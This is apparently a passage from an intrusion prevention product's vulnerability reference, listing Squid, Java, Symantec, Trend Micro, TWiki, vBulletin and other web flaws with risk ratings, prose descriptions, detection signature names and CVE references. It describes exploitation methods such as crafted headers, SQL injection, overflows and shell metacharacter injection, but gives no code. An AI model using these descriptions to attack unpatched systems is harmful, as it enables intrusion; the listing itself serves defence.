OSVDB-23086
http://www.osvdb.org/23086

HTTP-Squid-Authentication-Header-DoS

About this vulnerability:

Denial of service vulnerability in Squids authentication header handling

Risk:

Moderate

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

Squid Web Proxy Cache has a vulnerability in the handling of Proxy-Authorization HTTP headers. While using NTLM authorization, the Proxy-Authorization header field in all HTTP requests should begin with a case-sensitive "NTLM ". If this is not the case, Squids proxy server process will terminate and reset all established connections. A Squid monitor process can respawn the proxy server, but the vulnerability allows remote attackers to cause a denial of service by repeatedly sending specially-crafted headers.

Situation:

HTTP8080_CS-Squid-Authentication-Header-DoS

References:

CVE-2005-2917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2917

BID-14977
http://www.securityfocus.com/bid/14977

OSVDB-19607
http://www.osvdb.org/19607

HTTP-Squid-Proxy-Invalid-HTTP-Response-Status-Code-DOS

About this vulnerability:

Denial of service vulnerability in Squid

Risk:

Moderate

First detected in:

sgpkg-ips-235-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

There is a denial of service vulnerability in Squid.

Situation:

HTTP_SLS-Squid-Proxy-Invalid-HTTP-Response-Status-Code-DOS

References:

BID-35812
http://www.securityfocus.com/bid/35812

HTTP-Squid-Proxy-TRACE-Request-Remote-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in the Squid proxy

Risk:

Moderate

First detected in:

sgpkg-ips-104-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

The Squid proxy has a denial of service vulnerability. The Squid proxy process can be terminated with a crafted TRACE request that has a zero value in the Max-Forwards header field.

Situation:

HTTP8080_CS-TRACE-Request-With-Zero-Value-In-Max-Forwards-Header-Field

References:

CVE-2007-1560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1560

BID-23085
http://www.securityfocus.com/bid/23085

HTTP-Squid-Web-Proxy-HTTP-Request-Smuggling

About this vulnerability:

HTTP request smuggling vulnerability in Squid Web Proxy

Risk:

Moderate

First detected in:

sgpkg-ips-65-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

Squid Web Proxy has an HTTP request smuggling vulnerability. The web cache of Squid Web Proxy can be poisoned by sending a crafted HTTP request containing multiple content-length header fields.

References:

CVE-2005-0174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0174

BID-12412
http://www.securityfocus.com/bid/12412

HTTP-Stalkerlab-Mailers-File-Disclosure

About this vulnerability:

File disclosure in Stalkerlab Mailers 1.1.2

Risk:

Low

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Stalkerlab Mailers

Type:

Malfunction

Description:

Stalkerlab Mailers 1.1.2 has a vulnerability in the CGImail.exe that allows a remote attacker to gain read access to arbitrary files on the Web server.

Situation:

HTTP_CRL-Stalkerlab-Mailers-CGIMail-Access

References:

CVE-2000-0726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0726

BID-1623
http://www.securityfocus.com/bid/1623

HTTP-Subdreamer-Light-Global-Variables-SQL-Injection

About this vulnerability:

Subdreamer SQL injection via unfiltered global variables

Risk:

Moderate

First detected in:

sgpkg-ips-24-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Subdreamer Light

Type:

SQL Injection

Description:

Subdreamer Light allows remote attackers to execute arbitrary SQL commands. Some variables used in SQL queries are defined as global in the functions and are not filtered properly against user input. This allows SQL queries to be executed by including them in the vulnerable variables.

Situation:

HTTP_CRL-Subdreamer-Light-Global-Variables-SQL-Injection

References:

CVE-2005-0805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0805

BID-12839
http://www.securityfocus.com/bid/12839

HTTP-Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation

About this vulnerability:

Privilege escalation vulnerability in Sun JRE

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Runtime Environment

Type:

Input Validation

Description:

There is a privilege escalation vulnerability in Java Runtime Environment. A malicious java applet can bypass Java classloader security checks allowing access to restricted classes. This allows access to the local system from the applet, including arbitary code execution.

Situation:

HTTP_Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation
File-Binary_Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation

References:

CVE-2002-0896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0896

BID-8879
http://www.securityfocus.com/bid/8879

HTTP-Sun-Java-Runtime-Environment-Native-Methods-Memory-Corruption

About this vulnerability:	Memory corruption vulnerability in Sun's Java Virtual Machine
Risk:	Moderate
First detected in:	sgpkg-ips-90-1314
Last changed:	sgpkg-ips-1413-5242
Platform:	Generic
Software:	Sun Java Runtime Environment
Type:	Malfunction
Description:	There is a memory corruption vulnerability in Sun Java Runtime Environment. The vulnerability can be exploited by delivering a malicious Java applet to the target user.
Situation:	HTTP_SS-Sun-Java-Runtime-Environment-Native-Methods-Memory-Corruption

HTTP-Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Sun Java Web Start

Risk:

High

First detected in:

sgpkg-ips-150-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Web Start

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Sun Java Web Start. A remote attacker can exploit this vulnerability by persuading a user to open a malicious JNLP file with an excessively long encoding attribute value in the XML header. Successful exploitation could allow the attacker to execute arbitrary code with the privileges of the currently logged on user.

Situation:

HTTP_SS-Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow
File-TextId_Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow

References:

CVE-2008-1188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1188

BID-28083
http://www.securityfocus.com/bid/28083

OSVDB-42594
http://www.osvdb.org/42594

HTTP-Sun-Java-WebStart-Jnlp-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Sun Java Runtime Environment

Risk:

High

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Sun Java Runtime Environment

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Sun Java Runtime Environment. By persuading a user to visit a malicious web page, a remote attacker can execute non-privileged arbitrary code.

Situation:

HTTP_SS-Sun-Java-WebStart-Jnlp-Buffer-Overflow
File-TextId_Sun-Java-WebStart-Jnlp-Buffer-Overflow

References:

CVE-2007-3655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3655

BID-24832
http://www.securityfocus.com/bid/24832

OSVDB-37756
http://www.osvdb.org/37756

HTTP-SUSE-Apache-Cgi-Source-Disclosure

About this vulnerability:

SUSE Apache http server cgi source code disclosure

Risk:

Low

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

SUSE Linux 6

Software:

Apache

Type:

Insecure Configuration

Description:

The Apache http server installed by default on SUSE Linux (6.3, 6.4) could allow remote users to view cgi script sources. This is due to a default configuration that sets /cgi-bin-sdb/ as an alias for /cgi-bin/. Requests to /cgi-bin-sdb/ returns the script sources instead of executing them.

Situation:

HTTP_CSU-SUSE-Apache-Cgi-Source-Disclosure

References:

CVE-2000-0868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0868

BID-1658
http://www.securityfocus.com/bid/1658

HTTP-SUSE-Linux-Enterprise-Server-Remote-Manager-Content-Length-BOF

About this vulnerability:

Novell SUSE Linux Enterprise Server Remote Manager HTTP content-length buffer overflow

Risk:

Critical

First detected in:

sgpkg-ips-55-1210

Last changed:

sgpkg-ips-1584-5242

Platform:

SUSE Linux

Software:

Novell Open Enterprise Server

Type:

Buffer Overflow

Description:

Novell SUSE Linux Enterprise Server Remote Manager suffers from a buffer overflow vulnerability in the processing of HTTP requests. Unauthenticated remote attackers can send an HTTP request containing a negative Content-Length header to the Remote Manager software, causing a heap-based buffer overflow. A successful exploit allows arbitrary remote code execution with the software's privileges (root by default).

Situation:

HTTP_CSU-Sybase-EAServer-WebConsole-Buffer-Overflow

References:

CVE-2005-3655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3655

BID-16226
http://www.securityfocus.com/bid/16226

OSVDB-22455
http://www.osvdb.org/22455

HTTP-Sybase-EAServer-WebConsole-Buffer-Overflow

About this vulnerability:

Sybase EAServer buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sybase Enterprise Application Server

Type:

Buffer Overflow

Description:

Sybase Enterprise Application Server has a buffer overflow vulnerability concerning the handling of HTTP requests. If the request line of an HTTP request contains an excessively long request URI, the allocated stack buffer is overrun causing a DoS condition or allowing arbitrary code execution with the privileges of the jagsrv.exe process.

Situation:

References:

CVE-2005-2297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2297

BID-14287
http://www.securityfocus.com/bid/14287

OSVDB-17995
http://www.osvdb.org/17995

HTTP-Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF

About this vulnerability:

Buffer overflow vulnerability in the Symantec Backup Exec for Windows Servers

Risk:

Moderate

First detected in:

sgpkg-ips-148-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Backup Exec for Windows Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Symantec Backup Exec for Windows Servers. By persuading a user to view a malicious web page, a remote attacker can execute arbitrary code with the privileges of the currently logged on user.

Situation:

HTTP_SS-Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF
File-Text_Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF

References:

CVE-2007-6016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6016

BID-26904
http://www.securityfocus.com/bid/26904

HTTP-Symantec-Products-ActiveX-Control-NavComUI.dll-Code-Execution

About this vulnerability:

Symantec NavComUI.dll library has two code execution vulnerabilities

Risk:

High

First detected in:

sgpkg-ips-117-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Symantec Norton AntiVirus; Symantec Norton Internet Security; Symantec Norton System Works

Type:

Malfunction

Description:

Symantec NavComUI.dll library has two code execution vulnerabilities in AxSysListView32 and AxSysListView32OAA ActiveX controls due to insufficient input validation. A remote attacker can exploit these vulnerabilities by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-Symantec-Products-ActiveX-Control-NavComUI.dll-Code-Execution
HTTP_SS-Symantec-Products-ActiveX-Control-NavComUI.dll-Possible-Code-Execution
File-Text_Symantec-Products-ActiveX-Control-NavComUI.dll-Possible-Code-Execution

References:

CVE-2007-2955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2955

BID-24983
http://www.securityfocus.com/bid/24983

HTTP-Symantec-Sygate-Management-Server-Authentication-Servlet-SQL-Injection

About this vulnerability:

Symantec Sygate Management Server Authentication servlet SQL injection vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sygate Management Server

Type:

SQL Injection

Description:

Symantec Sygate Management Server suffers from an SQL injection vulnerability, which allows unauthenticated remote attackers to execute arbitrary database queries via HTTP requests. The issue allows the overwriting of arbitrary passwords, including the administrator password, leading to a complete compromise of the system.

Situation:

HTTP_CRL-Symantec-Sygate-Management-Server-Authentication-Servlet-SQL-Injection

References:

CVE-2006-0522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0522

BID-16452
http://www.securityfocus.com/bid/16452

OSVDB-22883
http://www.osvdb.org/22883

HTTP-Test-Cgi-Directory-Disclosure

About this vulnerability:

Vulnerable test scripts included in NCSA HTTPd and Apache

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NCSA HTTPd; Apache

Type:

Metacharacter Injection

Description:

Due to improperly quoted "echo" command in the test-cgi and nph-test-cgi sample shell scripts included in NCSA HTTPd as well as Apache, an attacker can obtain a directory listing of a directory the webserver process has access to.

Situation:

HTTP_CRL-Test-Cgi-Directory-Disclosure

References:

CVE-1999-0070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0070

BID-2003
http://www.securityfocus.com/bid/2003

HTTP-TikiWiki-Jhot.php-Script-File-Upload-Security-Bypass

About this vulnerability:

Script code file upload and execution vulnerability in TikiWiki

Risk:

High

First detected in:

sgpkg-ips-80-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TikiWiki

Type:

Malfunction

Description:

There is a script code file upload and execution vulnerability in TikiWiki. A remote attacker can compromise the target server running the vulnerable web application by uploading a malicious script file to the server and then executing it via HTTP GET request.

Situation:

HTTP_CS-TikiWiki-Jhot.php-Script-File-Upload-Security-Bypass

References:

CVE-2006-4602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4602

BID-19819
http://www.securityfocus.com/bid/19819

OSVDB-28456
http://www.osvdb.org/28456

HTTP-TRACE-Method-HTTP-Header-Information-Disclosure

About this vulnerability:

An HTTP TRACE Method HTTP Header Information Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic HTTP server

Type:

Configuration Error

Description:

A vulnerability in multiple web servers, for example Solaris Management Console and IBM WebSphere Application Server, when the TRACE method is enabled, allows remote attackers to gain sensitive information such as cookies and authentication data from HTTP headers.

Situation:

HTTP_CS-TRACE-Request

References:

CVE-2005-3398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3398

BID-11604
http://www.securityfocus.com/bid/11604

OSVDB-877
http://www.osvdb.org/877

HTTP-Trend-Micro-Control-Manager-Chunked-Encoding-Buffer-Overflow

About this vulnerability:

Trend Micro Control Manager HTTP chunked encoding vulnerability

Risk:

High

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trend Micro Control Manager

Type:

Buffer Overflow

Description:

Trend Micro Control Manager suffers from a buffer overflow in the handling of HTTP chunked encoding requests. The software allocates a small buffer for storing chunked encoding data without verifying the actual size of incoming data. A single large chunk or multiple small chunks can overflow the buffer, allowing remote attackers to execute arbitrary code on the system.

Situation:

HTTP_CSH-Trend-Micro-Control-Manager-Chunked-Encoding-Buffer-Overflow

References:

CVE-2005-1929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1929

BID-15865
http://www.securityfocus.com/bid/15865

OSVDB-21772
http://www.osvdb.org/21772

OSVDB-21771
http://www.osvdb.org/21771

HTTP-Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String

About this vulnerability:

Format string overflow vulnerability in Trend Micro OfficeScan

Risk:

Low

First detected in:

sgpkg-ips-82-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro OfficeScan Corporate Edition

Type:

Format String

Description:

Trend Micro OfficeScan has a format string vulnerability. By successfully exploiting this vulnerability, a remote attacker can cause a DoS or execute arbitrary non-privileged code on the victim's computer.

Situation:

HTTP8080_Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String
File-Text_Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String

References:

CVE-2006-5157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5157

BID-20284
http://www.securityfocus.com/bid/20284

HTTP-Trend-Micro-OfficeScan-Cgi-Password-Decryption-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Trend Micro OfficeScan Policy server

Risk:

Moderate

First detected in:

sgpkg-ips-147-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Trend Micro OfficeScan Corporate Edition

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Trend Micro OfficeScan Policy server. An unauthenticated attacker can exploit this vulnerability to compromise the vulnerable system.

Situation:

HTTP_CRL-Trend-Micro-OfficeScan-Cgi-Password-Decryption-Buffer-Overflow

References:

BID-28002
http://www.securityfocus.com/bid/28002

HTTP-Trend-Micro-OfficeScan-Multiple-Cgi-Modules-Form-Processing-BOF

About this vulnerability:

Trend Micro Control Manager HTTP Form Processing buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-181-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trend Micro OfficeScan

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Trend Micro's OfficeScan. The flaw is due to a boundary error when handling HTTP requests. An unauthenticated remote attacker can leverage this vulnerability to inject and execute arbitrary code with System level privileges on the target system. Vulnerable applications are Trend Micro OfficeScan 7.x Prior to 7.3 Build 1374 and Trend Micro OfficeScan 8.x Prior to 8.0 SP1 Patch 1.

Situation:

HTTP_CS-Trend-Micro-OfficeScan-Cgi-Module-Multipart-BOF

References:

CVE-2008-3862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3862

BID-31859
http://www.securityfocus.com/bid/31859

HTTP-TWiki-Configure-Script-TYPEOF-Parameter-Perl-Code-Execution

About this vulnerability:

Perl code execution vulnerability in the configure script in TWiki

Risk:

Low

First detected in:

sgpkg-ips-76-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TWiki

Type:

Code Injection

Description:

There is a Perl code execution vulnerability in the configure script in TWiki due to insufficient input validation of the TYPEOF parameter. By exploiting this vulnerability a remote attacker can execute arbitrary Perl code on the target host not configured properly with the privileges of the web server.

Situation:

HTTP_CSU-TWiki-Configure-Script-TYPEOF-Parameter-Command-Execution-2
HTTP_CRL-TWiki-Configure-Script-TYPEOF-Parameter-Perl-Code-Execution

References:

CVE-2006-3819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3819

BID-19188
http://www.securityfocus.com/bid/19188

OSVDB-27556
http://www.osvdb.org/27556

HTTP-TWiki-Rev-Parameter-Command-Execution

About this vulnerability:

TWiki allows arbitrary command execution via 'rev' parameter

Risk:

High

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TWiki

Type:

Malfunction

Description:

TWiki, an enterprise collaboration platform, is vulnerable to arbitrary command execution. User input to the 'rev' parameter is not properly sanitized, allowing remote attackers to execute arbitrary code by sending a specially-crafted parameter to 'rev'. Commands will be executed with the permissions of the web server.

Situation:

HTTP_CRL-TWiki-Rev-Parameter-Command-Execution

References:

CVE-2005-2877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2877

BID-14834
http://www.securityfocus.com/bid/14834

HTTP-VBulletin-Forum-Calendar-SQL-Injection

About this vulnerability:

VBulletin Forum's calendar is vulnerable to SQL injection

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

vBulletin

Type:

SQL Injection

Description:

Calendar.php in VBulletin Forum versions 2.3.xx and earlier are vulnerable to SQL injection. Remote attackers can exploit the vulnerability to modify database queries made by the software.

Situation:

HTTP_CRL-VBulletin-Forum-Calendar-SQL-Injection

References:

CVE-2004-0036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0036

BID-9360
http://www.securityfocus.com/bid/9360

OSVDB-3344
http://www.osvdb.org/3344

HTTP-VBulletin-Impex-Systempath-Code-Execution

About this vulnerability:

vBulletin ImpEx system code execution vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

vBulletin

Type:

Malfunction

Description:

vBulletin ImpEx (Import / Export) system has a remote file inclusion vulnerability. ImpExData.php uses the variable systempath to include a PHP file without initializing it first. If PHP's register_globals is disabled, remote attackers can specify an URL they control as the systempath, which can be used to force vBulletin into executing the attacker's code.

Situation:

HTTP_CRL-VBulletin-Impex-Systempath-Code-Execution

References:

CVE-2006-1382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1382

BID-17206
http://www.securityfocus.com/bid/17206

OSVDB-24070
http://www.osvdb.org/24070

HTTP-Verity-Ultraseek-Search-Path-Disclosure

About this vulnerability:

Verity's Ultraseek displays the server's document root in an error message

Risk:

Low

First detected in:

sgpkg-ips-9-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Verity Ultraseek

Type:

Malfunction

Description:

Verity's Ultraseek suffers from a path disclosure vulnerability. If a MS-DOS device name is encountered in the search option, the full path to the server's document root is given in an error message.

Situation:

HTTP_CRL-Verity-Ultraseek-Search-Path-Disclosure

References:

CVE-2004-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0050

BID-10275
http://www.securityfocus.com/bid/10275

HTTP-Vibechild-Directory-Manager-Edit-Image-Php-Vulnerability

About this vulnerability:

Vibechild Directory Manager edit_image.php Vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

PHP

Type:

Metacharacter

Description:

Vulnerabilitity in Vibechild Directory Manager before 0.91 allows remote attackers to execute arbitrary commands via edit_image.php script.

References:

CVE-2001-1020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1020

BID-3288
http://www.securityfocus.com/bid/3288

HTTP-Viralator-Code-Execution

About this vulnerability:

Code execution vulnerability in Viralator

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Viralator

Type:

Malfunction

Description:

Viralator has a vulnerability in the way it handles URLs. An attacker is able to include arbitrary code in the URL, which is then executed on the server running Viralator.

References:

CVE-2001-0849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0849

BID-3495
http://www.securityfocus.com/bid/3495

HTTP-ViRobot-Server-Addschup-Cookie-Buffer-Overflow

About this vulnerability:

ViRobot server addschup binary buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

ViRobot

Type:

Buffer Overflow

Description:

ViRobot Server is an anti-virus software that has a web-based control interface, which suffers from a buffer overflow vulnerability in the handling of cookies. A cookie containing a ViRobot_ID of over 32 bytes will cause a buffer overflow, leaking the ID into a variable used in the root's crontab entry. This allows remote attackers to execute arbitrary commands on the server as root by sending a HTTP request with a crafted cookie.

Situation:

HTTP_CS-ViRobot-Server-Addschup-Cookie-Buffer-Overflow

References:

CVE-2005-2041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2041

BID-12964
http://www.securityfocus.com/bid/12964

OSVDB-17320
http://www.osvdb.org/17320

HTTP-Virtual-Vision-FTP-Pl-Directory-Traversal

About this vulnerability:

Virtual Vision FTP Pl Directory Traversal

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Virtual Vision FTP Browser

Type:

Directory Traversal

Description:

Virtual vision contains a directory traversal vulnerability which when successfully exploited reveals the contents of a directory.

References:

CVE-2000-0674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0674

BID-1471
http://www.securityfocus.com/bid/1471

HTTP-VitalSuite-System-Compromise

About this vulnerability:

Access to vitalsuite by guessing a correct username

Risk:

Moderate

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT; Windows 2000

Software:

Lucent VitalSuite

Type:

Malfunction

Description:

Lucent VitalSuite uses cookies for authentication, but a flaw in the system allows remote attackers to gain access to the server by guessing a correct username.

Situation:

HTTP_CRL-VitalSuite-System-Compromise

References:

CVE-2002-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0236

BID-3784
http://www.securityfocus.com/bid/3784

HTTP-W3who-DLL-Long-Query-BOF

About this vulnerability:

Microsoft's W3who.dll buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP

Software:

Microsoft Windows Resource Kit

Type:

Buffer Overflow

Description:

Microsoft's W3Who ISAPI w3who.dll has a buffer-overflow vulnerability that can be exploited by sending a long parameter to the dll. The vulnerability may allow arbitrary code execution.

Situation:

HTTP_CRL-W3who-DLL-Long-Query-BOF

References:

CVE-2004-1134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1134

BID-11820
http://www.securityfocus.com/bid/11820

HTTP-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow

About this vulnerability:

Watchfire Appscan can be exploited to execute arbitrary code with a malicious HTTP 401 response

Risk:

Moderate

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Watchfire Appscan

Type:

Buffer Overflow

Description:

Watchfire Appscan is an automated web application testing tool. Due to insufficient input validation, it is possible to overflow a buffer in the application by sending a specially crafted HTTP response. A HTTP 401 response with a Realm field consisting of more than 350 characters will cause a buffer overflow when parsed by Watchfire Appscan, eventually leading to arbitrary code execution. A successful exploit requires that the attacker sets up a malicious http server that is scanned with a vulnerable version of the software.

Situation:

HTTP_SS-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow
HTTP_SHS-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow

References:

CVE-2005-4270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4270

BID-15873
http://www.securityfocus.com/bid/15873

HTTP-Web-Pals-Cgi-Vulnerability

About this vulnerability:

WebPals CGI script directory traversal and system compromise

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

WebPALS

Type:

Directory Traversal

Description:

The WebPals CGI script allows remote access to files and execution of commands. Depending on the Web server's configuration, this may allow a complete system compromise.

References:

CVE-2001-0217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0217

BID-2372
http://www.securityfocus.com/bid/2372

HTTP-Webactive-Log-Information-Disclosure

About this vulnerability:

Log file disclosure in WEBactive server 1.0

Risk:

Low

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows 95; Windows 98; Windows NT 4.0; Windows 2000

Software:

ITAfrica WEBactive

Type:

Insecure Configuration

Description:

WebActive web server stores the web-access log active.log as a default in the document root. This allows remote attackers to view the logs by requesting active.log.

References:

CVE-2000-0642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0642

BID-1497
http://www.securityfocus.com/bid/1497

HTTP-Webalizer-Cross-Site

About this vulnerability:

Cross-site vulnerability in Webalizer

Risk:

Moderate

First detected in:

sgpkg-ips-431-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Webalizer

Type:

Malfunction

Description:

Webalizer analyses web server log files and produces HTML reports. Two vulnerabilities allow remote attackers to run scripts in the security context of the site. If the attacker's address resolves to a hostname containing HTML-tags, they will be inserted unmodified into the generated reports. Attackers can also send a 'referer' http header containing HTML tags that will be inserted into the generated reports.

Situation:

HTTP_CSH-Referer-XSS

References:

CVE-2001-0835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835

BID-3473
http://www.securityfocus.com/bid/3473

HTTP-WebAPP-Apage-Command-Execution

About this vulnerability:

Command execution vulnerability in WebAPP apage.cgi

Risk:

Moderate

First detected in:

sgpkg-ips-27-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebAPP

Type:

Malfunction

Description:

WebAPP is a web portal system. WebAPP 'apage.cgi' has a vulnerability in the handling of the user supplied data. Remote attackers can execute arbitrary commands using shell metacharacters via the 'f' parameter.

Situation:

HTTP_CSU-WebAPP-Apage-Command-Execution

References:

CVE-2005-1628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1628

BID-13637
http://www.securityfocus.com/bid/13637

HTTP-Webcart-File-Disclosure

About this vulnerability:

Webcart File Disclosure

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Webcart

Type:

Configuration Error

Description:

The webcart application can be misconfigured to reveal any file on the system.

References:

CVE-1999-0610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0610

HTTP-WebConnect-Wcp-User-Directory-Traversal

About this vulnerability:

WebConnect directory traversal using the WCP_USER parameter

Risk:

Moderate

First detected in:

sgpkg-ips-23-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebConnect

Type:

Buffer Overflow

Description:

WebConnect 6.4.4 and 6.5 have a directory traversal vulnerability in the handling of WCP_USER parameter. The vulnerability can be exploited by setting the parms parameter to 'default' and including directory traversal sequences (..//) to the WCP_USER parameter. This allows remote attackers to view arbitrary files from the server.

Situation:

HTTP_CSU-WebConnect-Wcp-User-Directory-Traversal

References:

CVE-2004-0465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0465

BID-12613
http://www.securityfocus.com/bid/12613

HTTP-Webgais-Cgi-System-Compromise

About this vulnerability:

System command in webgais allows command execution

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebGAIS

Type:

Metacharacter Injection

Description:

The webgais script provides a web interface to the gais search engine. A system command in the script can be exploited to execute arbitrary commands by including shell metacharacters in the query.

Situation:

